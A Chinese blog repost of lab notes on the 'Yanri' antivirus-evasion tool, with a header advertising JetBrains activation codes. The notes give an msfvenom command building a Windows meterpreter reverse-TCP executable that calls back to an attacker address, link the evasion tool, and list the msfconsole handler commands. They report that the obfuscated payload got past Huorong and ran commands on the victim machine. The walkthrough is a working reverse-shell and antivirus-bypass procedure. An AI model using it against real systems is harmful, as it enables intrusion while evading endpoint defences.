掩日免杀笔记_在线笔记

掩日免杀笔记_在线笔记微信公众号:乌鸦安全扫取二维码获取更多信息!1.环境攻击机:kalilinux10.211.55.23受害机:Windows10360主动防御Windows7火绒主动防御2.生成exe文件在kalilinux下使用msfvenom生成一个64位的exe文件msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=10.211.55.23lport=4444-fexe…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

掩日免杀笔记_在线笔记

 

 

1. 环境

攻击机: kali linux 10.211.55.23

受害机: Windows10 360主动防御

Windows7 火绒主动防御

 

2. 生成exe文件

在kali linux下使用msfvenom生成一个64位的exe文件

 

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.211.55.23 lport=4444 -f exe -o 1.exe

 

掩日免杀笔记_在线笔记

 

将文件分别发送至Windows10上,此时需要将受害者的机器关闭全部杀软

使用掩日3.0进行免杀处理(这里会提示报错,需要安装一个软件,按照提示安装即可)

 

下载地址:

https://github.com/1y0n/av_evasion_tool/

 

将文件直接拖过来就行了

掩日免杀笔记_在线笔记

 

 

最后会生成一个YR_1.exe文件

掩日免杀笔记_在线笔记

 

 

将这两个文件分别压缩备份,发送到window10和window7上

 

掩日免杀笔记_在线笔记

 

3. 静态测试

打开各自的杀软进行测试

3.1 360

掩日免杀笔记_在线笔记

 

均报毒

3.2 火绒

掩日免杀笔记_在线笔记

 

只有一个文件报毒

4. 上线测试

4.1 攻击机配置

 


msfconsole



use exploit/multi/handler

set LHOST 10.211.55.23

set LPORT 4444

set payload windows/x64/meterpreter/reverse_tcp

exploit

掩日免杀笔记_在线笔记

 

 

4.2 360下

4.2.1 1..exe

直接gg

掩日免杀笔记_在线笔记

 

4.2.2 免杀版1.exe

直接gg

掩日免杀笔记_在线笔记

4.3 火绒

4.3.1. 1.exe

gg

掩日免杀笔记_在线笔记

4.3.2 免杀版1.exe

上线正常

掩日免杀笔记_在线笔记

执行命令

掩日免杀笔记_在线笔记

5. 总结

总体上来说,这款免杀工具已经是非常强了,而且公开了这么久,还支持部分免杀,很厉害了!?

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/171412.html原文链接:https://javaforall.net

(0)
上一篇 2022年8月22日 下午9:36
下一篇 2022年8月22日 下午9:36


相关推荐

  • 实用干货!Java乱码问题原因及解决方案大全

    实用干货!Java乱码问题原因及解决方案大全最近有粉丝给壹哥发来私信 问我 Java 里的乱码问题该怎么解决 说是自己被乱码问题给弄的焦头烂额的 其实乱码问题解决起来很简单 很多人搞不定乱码是由于没有找到导致乱码的根本原因 试想 如果你都找不到导致乱码的根本原因 就去网上一通百度查找 即使网上的内容讲地头头是道 但结果还是不能解决自己的问题 于是你就得出结论 网上的文章都是垃圾 其实 这是因为自己没找到问题产生的根源 你没有对症下药啊大兄弟 对于一些有经验的开发者来说 想遇到乱码还真不容易 但对于一些新手来说 乱码几乎是家常便饭 所以壹哥今

    2026年3月19日
    2
  • mac将phpstorm 从主屏移动到副显示器(解决)

    mac将phpstorm 从主屏移动到副显示器(解决)

    2022年2月11日
    40
  • oracle function详解,Oracle函数用法详解「建议收藏」

    oracle function详解,Oracle函数用法详解「建议收藏」本文概述函数是用于返回单个值的子程序。你必须在调用函数之前声明并定义一个函数。它可以在同一时间声明和定义,也可以在同一块中先声明然后定义。在Oracle中创建函数句法CREATE[ORREPLACE]FUNCTIONfunction_name[(parameter[,parameter])]RETURNreturn_datatypeIS|AS[declaration_sec…

    2025年8月31日
    7
  • DJI MSDK waypoint mission开发

    DJI MSDK waypoint mission开发DJIMSDKwaypo 开发前言 因为公司有一个需要飞机飞到某个点的需求 所以在此记录一下开发过程 文章目录 DJIMSDKwaypo 开发一 waypointmiss 介绍 二 Waypoint 构造 nbsp nbsp 1 飞行任务的航点 nbsp nbsp nbsp 1 Waypoint doublelatitu doublelongit floataltitud nbsp nbsp 2 航点航向 amp nbs

    2026年3月19日
    2
  • 小波变换 完美通俗解读

    小波变换 完美通俗解读申明 小波变换完美通俗解读 是 小波变换和 motion 信号处理 系列中的第一篇 原始出处为 windstorm 的网站 http www kunli info 并非本站原创 但这位大师深入浅出的讲解了小波变换 是你在学习小波的过程中 必看之作 小波变换和 motion 信号处理 系列共包含三篇 nbsp nbsp 第一篇 基础普及 小波变换完美通俗解读 nbsp nbsp 第二篇 深入小波 nbsp nbsp 第三篇 小波应用限于篇幅关系

    2026年3月19日
    2
  • Do not use lsnrctl and sqlplus as SYSDBA in RAC

    Do not use lsnrctl and sqlplus as SYSDBA in RAC

    2022年3月12日
    50

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号